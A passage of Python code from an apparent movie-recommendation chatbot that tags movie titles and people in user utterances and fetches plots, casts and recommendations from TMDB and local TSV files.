+movie_no_year).join(temp_list)\n \n return result_text.strip(), the_dict, mentioned_movie\n\n\nMOVIE_URL= \"MOVIE_NER_SERVICE_URL\" # test\ndef fetch_ner(last_bot_response, user_utterance, url=MOVIE_URL):\n data = {\n 'last_bot_response': last_bot_response,\n 'user_utterance': user_utterance\n }\n headers = {\n 'Content-Type': 'application/json',\n }\n data = json.dumps(data)\n resp = requests.post(url, headers=headers, data=data, timeout=20)\n return resp.json() \n\n\ndef min_edit_distance(s1, s2):\n if len(s1) > len(s2):\n s1,s2 = s2,s1\n distances = range(len(s1) + 1)\n for index2,char2 in enumerate(s2):\n new_distances = [index2+1]\n for index1,char1 in enumerate(s1):\n if char1 == char2:\n new_distances.append(distances[index1])\n else:\n new_distances.append(1 + min((distances[index1],\n distances[index1+1],\n new_distances[-1])))\n distances = new_distances\n\n return distances[-1]\n\n\ndef movie_placeholder(text, raw):\n\ttokens = text.split()\n\t\n\tindexer = 0\n\tnew_text = []\n\tb_movie_counter = 0\n\twhile indexer < len(tokens):\n\t\ttoken = tokens[indexer]\n\t\ttag = raw[indexer]\n\t\tif tag == 'O':\n\t\t\tnew_text.append(token)\n\t\telse:\n\t\t\tif 'B-movies' in tag:\n\t\t\t\tnew_text.append(\"[MOVIE_TITLE]\")\n\t\t\t\tb_movie_counter += 1\n\t\t\telif \"-movies\" not in tag:\t\t\t\t\n\t\t\t\tnew_text.append(token)\n\t\tindexer += 1\n\ttext_with_placeholder = \" \".join(new_text)\n\treturn text_with_placeholder, b_movie_counter\n\ndef process_more_than_one_movie(movies, text, raw):\n\ttokens = text.split()\n\ttemp = []\n\tmovie_taken = {}\n\tcounter = 0\n\tfor movie in movies:\t\t\n\t\tmovie_taken[counter] = (movie, False)\n\t\tcounter += 1\n\n\tcounter = 0\n\tmovie_list = []\n\tif debug_print:\n\t\tprint(\"RAW: \" + str(raw))\n\tb_eval = 0\n\tb_movie = 0\n\tfor token, tag in zip(tokens, raw):\n\t\tif 'B-movies' in tag:\n\t\t\ttemp.append(token)\n\t\t\tb_movie += 1\n\t\telif 'I-movies' in tag:\n\t\t\ttemp.append(token)\n\t\t\tif debug_print:\n\t\t\t\tprint(temp)\n\t\telse:\n\t\t\t#evaluate temp\n\t\t\tnew_temp = preprocess(\" \".join(temp))\n\t\t\tif debug_print:\n\t\t\t\tprint(\"ELSE: \" + str(b_movie) + \" \" + str(b_eval) + \" \" + str(b_movie - 1))\n\t\t\tif b_eval == b_movie - 1:\n\t\t\t\twhile counter < len(movies):\n\t\t\t\t\tif not movie_taken[counter][1]:\n\t\t\t\t\t\ttitle = movie_taken[counter][0]['title']\n\t\t\t\t\t\tyear = movie_taken[counter][0]['year']\n\n\t\t\t\t\t\tscore = min_edit_distance(new_temp, preprocess(title))\n\t\t\t\t\t\tif score < 3:\n\t\t\t\t\t\t\tmovie_list.append(title + \" ({})\".format(year))\n\t\t\t\t\t\t\ttemp = []\n\t\t\t\t\t\t\tb_eval += 1\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tcounter += 1\n\n\tif b_eval == b_movie - 1:\n\t\tnew_temp = preprocess(\" \".join(temp))\n\t\twhile counter < len(movies):\n\t\t\tif not movie_taken[counter][1]:\n\t\t\t\ttitle = movie_taken[counter][0]['title']\n\t\t\t\tyear = movie_taken[counter][0]['year']\n\n\t\t\t\tscore = min_edit_distance(new_temp, preprocess(title))\n\t\t\t\tif score < 3:\n\t\t\t\t\tmovie_list.append(title + \" ({})\".format(year))\n\t\t\t\t\ttemp = []\n\t\t\t\t\tb_eval += 1\n\t\t\t\t\tbreak\n\t\t\tcounter += 1\n\treturn movie_list\n\ndef get_multiple_movies(real_text, movie_list):\n result = []\n dup_movies = {}\n for movie in movie_list:\n title = movie['title']\n if debug_print:\n print(\"title: \" + str(title))\n year = movie['year']\n movie_type = movie['type']\n\n if preprocess(title) in preprocess(real_text) and preprocess(title) not in dup_movies:\n result.append(title + \" ({})\".format(year))\n dup_movies[preprocess(title)] = 1\n return result\n\ntitle_to_tmdb = {}\ndef get_movies(ner_result, raw_text, movie_counter):\n\tmovie_list = ner_result['movie']\n\traw = ner_result['raw'][0]\n\ttext = preprocess(raw_text)\n\tif movie_list == []:\n\t\treturn \"\"\n\telse:\n\t\tmovies = []\n\t\tif movie_counter == 1:\n\t\t\ttitle = movie_list[0]['title']\n\t\t\tyear = movie_list[0]['year']\n\t\t\ttmdb = movie_list[0]['tmdbId']\n\t\t\ttokenized_title = preprocess(title).split(\" \")\n\t\t\tcounter = 0\n\t\t\tmovie_name = []\n\t\t\tfor token in tokenized_title:\n\t\t\t\tif token not in stop_words:\n\t\t\t\t\tif token in text.split(\" \"):\n\t\t\t\t\t\tcounter += 1\n\n\t\t\ttokenized_text = text.split(\" \")\n\t\t\tfor token, tag in zip(tokenized_text, raw):\n\t\t\t\tif \"-movies\" in tag:\n\t\t\t\t\tmovie_name.append(token)\n\n\t\t\ttotal_len = len(tokenized_title)\n\t\t\tnormalized = counter*100/total_len\n\n\t\t\tif total_len > 2:\n\t\t\t\tif normalized < 60:\t\t\t\t\t\n\t\t\t\t\treturn \"\"\n\t\t\tprocessed_movie_name = \t\" \".join(movie_name)\n\n\t\t\tif total_len <= 2:\n\t\t\t\tif normalized < 50:\n\t\t\t\t\tif total_len == 2:\n\t\t\t\t\t\tnew_title = title.replace(\" \", \"\").lower()\n\t\t\t\t\t\t\n\t\t\t\t\t\tif new_title in preprocess(processed_movie_name):\n\t\t\t\t\t\t\tresult_title = title + \" ({})\".format(year)\n\t\t\t\t\t\t\ttitle_to_tmdb[result_title] = tmdb\n\t\t\t\t\t\t\treturn result_title\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treturn \"\"\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn \"\"\n\t\t\ttitle_to_tmdb[title + \" ({})\".format(year)] = tmdb\n\t\t\treturn title + \" ({})\".format(year)\n\t\telif movie_counter > 1:\n\t\t\tresult = get_multiple_movies(text, movie_list)\n\t\t\tstr_result = \"; \".join(result)\n\t\t\treturn str_result\n\t\telse:\n\t\t\treturn \"\"\n\ndef process_movie_title(text_with_placeholder, movies, mentioned):\n\ttext_split = text_with_placeholder.split(\" \")\n\tmovie_in_text = movies.split(\";\")\n\ttaken_movie = []\n\tfor movie in movie_in_text:\n\t\tif movie not in taken_movie:\n\t\t\ttaken_movie.append(movie.strip())\n\tif debug_print:\n\t\tprint(taken_movie)\n\ttaken_movie.reverse()\n\tif debug_print:\n\t\tprint(\"new: \" + str(taken_movie))\n\t\tprint(\"------------\")\n\tresult = []\n\trelated_movie = \"\"\n\tfor token in text_split:\n\t\tif token == \"[MOVIE_TITLE]\":\n\t\t\tif len(taken_movie) > 0:\n\t\t\t\trelated_movie = taken_movie.pop()\n\t\t\tif related_movie not in mentioned:\n\t\t\t\tmv_idx = len(mentioned)\n\t\t\t\tmentioned[related_movie] = mv_idx\n\n\t\t\tthe_idx = mentioned[related_movie]\n\n\t\t\ttoken = \"[MOVIE_TITLE_{}]\".format(the_idx)\n\n\t\tresult.append(token)\n\n\tstr_result = \" \".join(result)\n\treturn str_result, mentioned\n\nstop_words = [\"of\", \"in\", \"the\", \"to\", \"is\", \"a\", \"on\", \"into\", \"with\"]\ndef create_movie_slot(rec_prev_utt, seeker_utt, movie_mentioned):\n rec = preprocess(re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', rec_prev_utt).strip())\n if debug_print:\n print(rec)\n seek = preprocess(seeker_utt)\n ner_result = fetch_ner(rec, seek)\n if debug_print:\n print(ner_result)\n text = preprocess(seek)\n try:\n raw = ner_result['raw'][0]\n except:\n return seeker_utt, \"\", movie_mentioned\n\n text_with_placeholder, movie_counter = movie_placeholder(text, raw)\n movie_result = get_movies(ner_result, text, movie_counter)\n if debug_print:\n print(\"movie result: \" + str(movie_result))\n print(text_with_placeholder)\n \n if movie_result == \"\":\n text_with_placeholder = seeker_utt\n mentioned = movie_mentioned\n else:\n if debug_print:\n print(\"debug here\")\n text_with_placeholder, mentioned = process_movie_title(text_with_placeholder, movie_result, movie_mentioned)\n \n return text_with_placeholder, movie_result, mentioned\n\nTMDB_KEY = \"TMDB_KEY\"\ndef load_movie_name(input_file):\n\tnames = pd.read_csv(input_file, sep=\"\\t\")\n\tname_list = names['Name'].values\n\n\treturn name_list\n\nperson_db = {}\nname_list = load_movie_name(\"TSV_MOVIE_DATA_PATH\")\n\ndef search_person(person_name):\n\tprocessed_person_name = person_name.replace(\" \", \"%20\")\n\tthe_url = \"apiURL\".format(TMDB_KEY, processed_person_name)\n\tperson_info_json = urlopen(the_url).read().decode('utf8')\n\tperson_info = json.loads(person_info_json)\n\treturn person_info\n\ndef person_is_there(person_info):\n\treturn person_info[\"total_results\"] > 0\n\ndef find_name(new_text, name_db, name_dict, director_dict, people_dict):\n\ttemp_text = new_text.split(\"[SEP]\")\n\tnew_text = temp_text[0]\n\tending = \"\"\n\tif len(temp_text) > 1 and temp_text[1] != \"\":\n\t\tending = \"[SEP]\" + temp_text[1]\n\tnew_name_dict = name_dict\n\tnew_director_dict = director_dict\n\tnew_people_dict = people_dict\n\tpunctuations = set(string.punctuation)\n\treturned_text = \"\"\n\ttokenized_text = new_text.encode('ascii', 'ignore').decode('ascii').split(\" \")\n\tthe_text = []\n\tpeople_names = []\n\tinfo_list = []\n\tindex = 0\n\tpeople_indexer = 1\n\n\twhile index < len(tokenized_text):\n\t\ttoken = tokenized_text[index]\n\t\tcondition1 = len(token) > 1 and token[0].isupper() and index+1 < len(tokenized_text)\n\t\tcondition2 = len(token) > 1 and (token[0] == \"(\" or token[0] == '\"') and index+1 < len(tokenized_text) and token[1].isupper() and index+1 < len(tokenized_text) and token[len(token)-1] not in punctuations\n\t\t\n\t\tif condition1:\n\t\t\tname_token = token\n\t\t\tbefore_punct = \"\"\n\n\t\tthe_punct = \"\"\n\t\tif condition2:\n\t\t\tname_token = token[1:]\t\t\t\t\t\t\n\t\t\tbefore_punct = token[0]\t\n\n\t\tprocessed = False\n\t\tafter_punct = \"\"\n\t\tnext_names = []\n\t\tif condition1 or condition2:\n\n\t\t\t\n\t\t\tnext_idx = index+1\n\t\t\twhile next_idx < len(tokenized_text):\n\t\t\t\tnext_token = tokenized_text[next_idx]\n\t\t\t\t\n\n\t\t\t\tif len(next_token) > 1 and (next_token[0].isupper() or next_token == \"de\") and len(next_token) > 1:\n\t\t\t\t\tif name_token in name_db:\n\t\t\t\t\t\t\n\t\t\t\t\t\t#check if next token has punctuations?\n\t\t\t\t\t\tnext_name = \"\"\n\t\t\t\t\t\t# print(next_token)\n\t\t\t\t\t\tend = len(next_token)\n\t\t\t\t\t\tif end >= 3 and next_token[:3] == \"Jr.\":\n\t\t\t\t\t\t\tinit = 3\n\t\t\t\t\t\t\tnext_name = \"Jr.\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinit = 0\n\t\t\t\t\t\ttime_to_quit = False\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor pos in range(init, end):\n\t\t\t\t\t\t\tchar = next_token[pos]\n\t\t\t\t\t\t\tif char not in punctuations:\n\t\t\t\t\t\t\t\tif not time_to_quit:\n\t\t\t\t\t\t\t\t\tnext_name += char\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif (char == \"'\" or char == \"-\") and pos != len(next_token) -1 and next_token[pos+1] not in punctuations:\n\t\t\t\t\t\t\t\t\t\tnext_name += char\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tafter_punct += char\n\t\t\t\t\t\t\t\t\ttime_to_quit = True\n\t\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tnext_names.append(next_name)\n\t\t\t\t\t\tif time_to_quit:\n\t\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\tnext_idx += 1\n\n\t\tif len(next_names) >= 1:\n\t\t\t\n\t\t\tthe_names = \" \".join(next_names)\n\t\t\tfull_name = name_token + \" \" + the_names\n\t\t\tnext_names = []\n\t\t\tresult = search_person(full_name)\n\t\t\t\n\t\t\tif \"Star Wars\" not in full_name and \"Captain America\" not in full_name and \"James Bond\" not in full_name:\n\t\t\t\tif person_is_there(result):\n\t\t\t\t\tfull_name_from_db = result[\"results\"][0][\"name\"]\n\t\t\t\t\tedit_score = min_edit_distance(full_name, full_name_from_db)\n\t\t\t\t\tif edit_score <= 2:\n\t\t\t\t\t\t\n\n\t\t\t\t\t\tpeople_names.append(full_name)\n\t\t\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\t\t\tperson_job = info[\"known_for_department\"]\n\t\t\t\t\t\tperson_top_movies = info[\"known_for\"]\n\t\t\t\t\t\tif person_id not in person_db:\n\t\t\t\t\t\t\tperson_db[person_id] = {\"job\": person_job, \"top_movies\": person_top_movies, \"name\": full_name}\n\t\t\t\t\t\tinfo_list.append(person_id)\n\t\t\t\t\t\tif person_job == \"Acting\":\n\t\t\t\t\t\t\tjob_type = \"ACTOR\"\n\t\t\t\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\n\t\t\t\t\t\telif person_job == \"Directing\":\n\t\t\t\t\t\t\tjob_type = \"DIRECTOR\"\n\t\t\t\t\t\t\tif full_name in new_director_dict:\n\t\t\t\t\t\t\t\tname_idx = new_director_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = len(new_director_dict)\n\t\t\t\t\t\t\t\tnew_director_dict[full_name] = name_idx\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tjob_type = \"PEOPLE\"\n\t\t\t\t\t\t\tif full_name in new_people_dict:\n\t\t\t\t\t\t\t\tname_idx = new_people_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = len(new_people_dict)\n\t\t\t\t\t\t\t\tnew_people_dict[full_name] = name_idx\n\n\t\t\t\t\t\t\n\t\t\t\t\t\tplaceholder = before_punct + \"[MOVIE_P_{}_{}]\".format(job_type, name_idx) + after_punct\n\t\t\t\t\t\tthe_text.append(placeholder)\n\t\t\t\t\t\t\n\n\t\t\t\t\t\tpeople_indexer += 1\n\t\t\t\t\t\tprocessed = True\n\n\t\tif processed:\n\t\t\tindex = next_idx\n\t\telse:\n\t\t\tif \"Schwarzenegger\" in token:\n\t\t\t\tresult = search_person(\"Schwarzenegger\")\n\t\t\t\tname = result[\"results\"][0][\"name\"]\n\t\t\t\tpeople_names.append(name)\n\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\tinfo_list.append(person_id)\n\t\t\t\tfull_name = name\n\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\telse:\n\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\t\t\t\ttoken = token.replace(\"Schwarzenegger\", \"[MOVIE_P_ACTOR_{}]\".format(name_idx))\n\t\t\tif \"Awkwafina\" in token:\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tresult = search_person(\"Awkwafina\")\n\t\t\t\tname = result[\"results\"][0][\"name\"]\n\t\t\t\tpeople_names.append(name)\n\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\tinfo_list.append(person_id)\n\t\t\t\tfull_name = name\n\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\telse:\n\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\t\t\t\ttoken = token.replace(\"Awkwafina\", \"[MOVIE_P_ACTOR_{}]\".format(name_idx))\n\n\t\t\tthe_text.append(token)\n\t\t\tindex += 1\n\n\tthe_text = \" \".join(the_text)\n\n\treturn the_text+ending, people_names, new_name_dict, new_people_dict, new_director_dict\n\nSENTIMENT_URL = 'SENTIMENT_DETECTION_SERVICE_URL'\nheaders = {'content-type': 'application/json'}\ndef get_sentiment(text):\n\tsentence = str(text).lower()\n\tdata = [{\"text\": sentence}]\n\tdata = json.dumps(data)\n\tTIMEOUT = 50\n\tresult = requests.post(url=SENTIMENT_URL, data=data, headers=headers, timeout=TIMEOUT).json()\n\treturn result[0]\n\ndef load_movie_to_dict():\n\tfilename = \"filePath.tsv\"\n\tmovie_map_dict = {}\n\tdata = pd.read_csv(filename, sep=\"\\t\")\n\ttitle_to_id = {}\n\tfor idx, row in data.iterrows():\n\t\tmovie_id = row['movie_id']\n\t\ttitle = row['title']\n\t\tyear = row['year']\n\t\tmovie_map_dict[movie_id] = {\"title\": title, \"year\": year}\n\t\ttitle_to_id[title+ \" ({})\".format(year)] = movie_id\n\treturn movie_map_dict, title_to_id\n\ndef have_youtube_trailer(full_movie_dataset, title_to_id):\n\tdata = pd.read_csv(full_movie_dataset, sep=\"\\t\")\n\tvalid_id = {}\n\tfor idx, row in data.iterrows():\n\t\ttitle = row['title']\n\t\tyear = row['year']\n\t\tkey = title+ \" ({})\".format(year)\n\t\tif key in title_to_id:\n\t\t\tval = title_to_id[key]\n\t\t\tvalid_id[val] = row\n\n\treturn valid_id\n\nvalid_id = have_youtube_trailer(\"filePath.tsv\", title_to_id)\n\ndef load_movie_db():\n the_dict = {}\n popular_action_movies = \"filePath.tsv\"\n action_movie = pd.read_csv(popular_action_movies, sep=\"\\t\")\n \n popular_comedy_movies = \"filePath.tsv\"\n comedy_movie = pd.read_csv(popular_comedy_movies, sep=\"\\t\")\n \n popular_drama_movies = \"filePath.tsv\"\n drama_movie = pd.read_csv(popular_drama_movies, sep=\"\\t\")\n \n popular_scifi_movies = \"filePath.tsv\"\n scifi_movie = pd.read_csv(popular_scifi_movies, sep=\"\\t\")\n \n popular_horror_movies = \"filePath.tsv\"\n horror_movie = pd.read_csv(popular_horror_movies, sep=\"\\t\")\n \n popular_documentary_movies = \"filePath.tsv\"\n doc_movie = pd.read_csv(popular_documentary_movies, sep=\"\\t\")\n \n the_dict['action'] = action_movie\n the_dict['comedy'] = comedy_movie\n the_dict['drama'] = drama_movie\n the_dict['scifi'] = scifi_movie\n the_dict['horror'] = horror_movie\n the_dict['documentary'] = doc_movie\n \n return the_dict\n\npopular_movies_by_genre = load_movie_db()\nprint(\"Finish loading movies...\")\n\ndef load_movies_by_genre(genre):\n if genre == \"western\":\n path = \"filePath.tsv\"\n elif genre == \"war\":\n path = \"filePath.tsv\"\n elif genre == \"thriller\":\n path = \"filePath.tsv\"\n elif genre == \"sport\":\n path = \"filePath.tsv\"\n elif genre == \"romance\":\n path = \"filePath.tsv\"\n elif genre == \"mystery\":\n path = \"filePath.tsv\"\n elif genre == \"animation\":\n path = \"filePath.tsv\"\n elif genre == \"family\":\n path = \"filePath.tsv\"\n elif genre == \"fantasy\":\n path = \"filePath.tsv\"\n elif genre == \"biography\":\n path = \"filePath.tsv\"\n elif genre == \"musical\":\n path = \"filePath.tsv\"\n else:\n path = \"filePath.tsv\"\n \n movies = pd.read_csv(path, sep=\"\\t\")\n return movies\n\ndef load_vector(input_file):\n\tlist_id_to_movie_id = {}\n\tmovie_id_to_list_id = {}\n\tmovie_list = []\n\twith open(input_file, 'r') as read_file:\n\t\tcounter = 0\n\t\tfor each_line in read_file:\n\t\t\tthe_list = each_line.strip().split(\"\\t\")\n\t\t\tmovie_id = the_list[0].replace(\"movieID_\", \"\")\n\t\t\tmovie_id = int(movie_id)\n\t\t\tlist_id_to_movie_id[counter] = movie_id\n\t\t\tmovie_id_to_list_id[movie_id] = counter\n\t\t\tmovie_list.append(the_list[1:])\n\t\t\tcounter += 1\n\n\tnp_list = np.array(movie_list)\n\n\treturn np_list, list_id_to_movie_id, movie_id_to_list_id\n\ndef search(movie_id, matrix, N):\n\tmovie_score = matrix[movie_id:movie_id+1]\n\n\tsim_matrix_score = cosine_similarity(movie_score, matrix)\n\n\tid_sim_score_dict = {}\n\tfor idx, element in enumerate(sim_matrix_score.flatten()):\n\t\tid_sim_score_dict[idx] = element\n\tsorted_key = sorted(id_sim_score_dict, key=id_sim_score_dict.get, reverse=True)\n\ttop_N_indexes = sorted_key[:N]\n\tif debug_print:\n\t\tprint(top_N_indexes)\n\treturn top_N_indexes\n\ndef filter_movies(current_movie_id, other_movie_id, movie_map):\n try:\n current_mv_info = movie_map[current_movie_id]\n other_mv_info = movie_map[other_movie_id]\n\n current_mv_genre = set(current_mv_info['genre'].lower().split(\", \"))\n other_genre = set(other_mv_info['genre'].lower().split(\", \"))\n intersection_genre = current_mv_genre.intersection(other_genre)\n except:\n return False\n if len(intersection_genre) > 0:\n return True\n else:\n return False\n \n\ndef get_title(movie_id, top_N_indexes, movie_map, counter_movie_id):\n from_list_to_movie_id = counter_movie_id[movie_id]\n from_movie_id_to_title = movie_map[from_list_to_movie_id]\n the_result = []\n for movie_id_in_list in top_N_indexes:\n result = counter_movie_id[movie_id_in_list]\n if True:\n if result in valid_id and result != counter_movie_id[movie_id]:\n filtered = filter_movies(counter_movie_id[movie_id], result, valid_id)\n if filtered:\n title = movie_map[result][\"title\"]\n current_year = int(movie_map[result][\"year\"])\n \n if the_result == []:\n the_result.append(title + \" ({})\".format(current_year))\n else:\n temp_result = []\n is_inserted = False\n for element in the_result:\n content = element.split(\" \")\n \n element_title = \" \".join(content[:len(content)-1])\n element_year = int(content[len(content)-1].replace(\"(\",\"\").replace(\")\", \"\"))\n if element_year >= current_year:\n if element not in temp_result:\n temp_result.append(element)\n else:\n if not is_inserted:\n temp_result.append(title + \" ({})\".format(current_year))\n is_inserted = True\n temp_result.append(element)\n if not is_inserted:\n temp_result.append(title + \" ({})\".format(current_year))\n the_result = temp_result\n\n \n return the_result\n\ndef load_actor():\n with open('ACTOR_DATA_Path.tsv', 'rb') as file:\n actor_data = pickle.load(file)\n return actor_data\n\n\ndef get_actor_movies(actor_data, positive_actor, user_favorites):\n list_of_movies = actor_data[positive_actor]\n try:\n fav_genre_list = user_favorites['genre']\n except:\n fav_genre_list = []\n if len(list_of_movies) >= 1:\n recommended_movie = None\n founded = False\n for movie in list_of_movies:\n genres = movie['genre']\n genre_list = genres.split(\", \")\n if len(genre_list) >= 1:\n for genre in genre_list:\n if genre in fav_genre_list:\n recommended_movie = movie\n founded = True\n break\n if founded:\n break\n if not founded:\n recommended_movie = list_of_movies[0]\n \n movie_title = recommended_movie['title']\n movie_year = recommended_movie['year']\n return [movie_title + \" ({})\".format(movie_year)]\n else:\n return []\n\ndef recommend_from_tmdb(movie_title):\n tokenized_title = movie_title.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_title\n recommendations = []\n \n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n \n tmdb_movie_id = \"\"\n if len(results) > 0:\n tmdb_movie_id = results[0]['id']\n \n if tmdb_movie_id != \"\":\n rec_url = \"url\".format(tmdb_movie_id, TMDB_KEY)\n rec_result_json = urlopen(rec_url).read().decode('utf8')\n rec_info = json.loads(rec_result_json)\n results = rec_info['results']\n for item in results:\n title = item['title']\n year = item['release_date'].split(\"-\")[0]\n title_and_year = title + \" ({})\".format(year)\n if title_and_year in title_to_id:\n movie_id = title_to_id[title_and_year]\n if movie_id in valid_id:\n recommendations.append(title_and_year)\n \n return recommendations\n\n\ndef give_recommendation(user_favorite_thing, positive_genre, positive_actor, fav_attribute, already_recommended, n=2):\n fav_movie = user_favorite_thing['movies']\n fav_genre = user_favorite_thing['genres']\n fav_actor = user_favorite_thing['actors']\n \n recommendation = []\n if (fav_movie == [] and positive_actor==\"\") or fav_attribute == \"genre\":\n if debug_print:\n print(\"Give recommendation based on GENRE:\" + str(positive_genre))\n target_genre = positive_genre\n\n if target_genre not in popular_movies_by_genre:\n movies = load_movies_by_genre(target_genre)\n popular_movies_by_genre[target_genre] = movies\n \n list_of_movies = popular_movies_by_genre[target_genre]\n \n taken = False\n n_taken = 0\n for idx in range(100):\n movie_desc = list_of_movies.iloc[idx]\n title = movie_desc['title']\n year = movie_desc['year']\n key = title + \" ({})\".format(year)\n if key not in already_recommended:\n genres = movie_desc['genre'].lower().split(\", \")\n \n already_recommended[key] = movie_desc\n recommendation.append(key)\n taken = True\n n_taken += 1\n \n if n_taken == n:\n break\n else:\n if positive_actor != \"\":\n if debug_print:\n print(\"Give recommendation based on ACTOR:\" + str(positive_actor))\n recommendation = get_actor_movies(actor_data, positive_actor, user_favorite_thing)\n if fav_attribute != \"actor\" or recommendation == []:\n if debug_print:\n print(\"Give recommendation based on MOVIE\")\n last_mentioned = fav_movie[len(fav_movie)-1]\n if debug_print:\n print(\"last mentioned MOVIE in give recommendation: \", last_mentioned)\n recommended_titles = recommend_from_tmdb(last_mentioned)\n recommendation = recommended_titles\n if recommendation == []:\n #remove year\n remove_year = last_mentioned.split(\" \")\n title_only = \" \".join(remove_year[:len(remove_year)-1])\n recommendedation = recommend_from_tmdb(title_only)\n if recommendation == [] and positive_genre != \"\":\n target_genre = positive_genre\n\n if target_genre not in popular_movies_by_genre:\n movies = load_movies_by_genre(target_genre)\n popular_movies_by_genre[target_genre] = movies\n\n list_of_movies = popular_movies_by_genre[target_genre]\n\n taken = False\n n_taken = 0\n for idx in range(100):\n movie_desc = list_of_movies.iloc[idx]\n title = movie_desc['title']\n year = movie_desc['year']\n key = title + \" ({})\".format(year)\n if key not in already_recommended:\n genres = movie_desc['genre'].lower().split(\", \")\n\n already_recommended[key] = movie_desc\n recommendation.append(key)\n taken = True\n n_taken += 1\n\n if n_taken == n:\n break \n \n return recommendation, already_recommended\n\ndef get_movie_plot(text, movie_name):\n if \"PLOT]\" in text:\n tokenized_title = movie_name.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_name\n try:\n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n\n results = movie_info['results']\n if len(results) > 0:\n content = results[0]['overview']\n if \"[MOVIE_PLOT]\" in text:\n result = text.replace(\"[MOVIE_PLOT]\", '[SPLIT]\"{}\"[SPLIT]'.format(content))\n content = result.split(\"[SPLIT]\")\n temp_list = []\n for element in content:\n temp_list.append(element.strip())\n result = \" \".join(temp_list)\n result = result.strip()\n elif \"PLOT]\" in text:\n result = text.replace(\"PLOT]\", '[SPLIT]\"{}\"[SPLIT]'.format(content))\n content = result.split(\"[SPLIT]\")\n temp_list = []\n for element in content:\n temp_list.append(element.strip())\n result = \" \".join(temp_list)\n result = result.strip()\n else:\n result = text\n return result\n except:\n return \"The movie has interesting plot\"\n elif \"It is about\" in text:\n new_text = text.split(\"It is about\")\n \n try:\n if title_to_id[movie_name] in valid_id:\n content = valid_id[title_to_id[movie_name]]\n summary = content['short_plot']\n text = new_text[0] + ' \"' + summary + '\"'\n \n else:\n tokenized_title = movie_name.split(\" \")\n if len(tokenized_title)>1:\n \n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_name\n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n\n results = movie_info['results']\n if len(results) > 0:\n content = results[0]['overview']\n text = new_text[0] + 'It is about \"' + content + '\"'\n else:\n return \"It has an interesting story\"\n except:\n return \"The movie has interesting plot\"\n return text.strip()\n else:\n return text.strip()\n\n\ndef replace_actors(text, movie_name, mentioned_actors, last_mentioned, idx_turn):\n actor_list = []\n if \"P_ACTOR\" in text:\n text = text.strip()\n if movie_name in title_to_id and title_to_id[movie_name] in valid_id:\n content = valid_id[title_to_id[movie_name]]\n actor_list = content['actors'].split(\", \")\n if debug_print:\n print(actor_list)\n else:\n tokenized_title = movie_name.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_name\n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n\n tmdb_movie_id = \"\"\n if len(results) > 0:\n tmdb_movie_id = results[0]['id']\n cast_url = \"url\".format(tmdb_movie_id, TMDB_KEY)\n cast_json = urlopen(cast_url).read().decode('utf8')\n cast_info = json.loads(cast_json)\n cast = cast_info[\"cast\"]\n actor_list = []\n for character in cast:\n the_name = character[\"name\"]\n actor_list.append(the_name)\n if len(actor_list) >= 4:\n break\n else:\n actor_list = []\n \n if actor_list == []:\n return \"I think the movie has great actors in it!\", mentioned_actors\n\n \n taken_actor = []\n result = text.replace(\"[MOVIE_PLOT]\", '\"{}\"'.format(content['short_plot']))\n tokenized_sent = text.split(\" \")\n \n actor_token_counter = 0\n normal_token_counter = 0\n \n placeholder_id_to_text = {y:x for x,y in mentioned_actors.items()}\n print(placeholder_id_to_text )\n coref_text = []\n noncoref_text = []\n i = 0\n j = 0\n new_mentioned1 = mentioned_actors\n new_mentioned2 = mentioned_actors\n tokenized_by_comma = text.split(\",\")\n prev_word = \"\"\n if len(last_mentioned) > 1:\n diff_turn = idx_turn - last_mentioned[1]\n else:\n diff_turn = 0\n threshold_name = 3\n for token in tokenized_sent:\n has_actor = False\n if \"[MOVIE_P_ACTOR_\" in token:\n get_idx = token.split(\"[MOVIE_P_ACTOR_\")\n has_actor = True\n elif 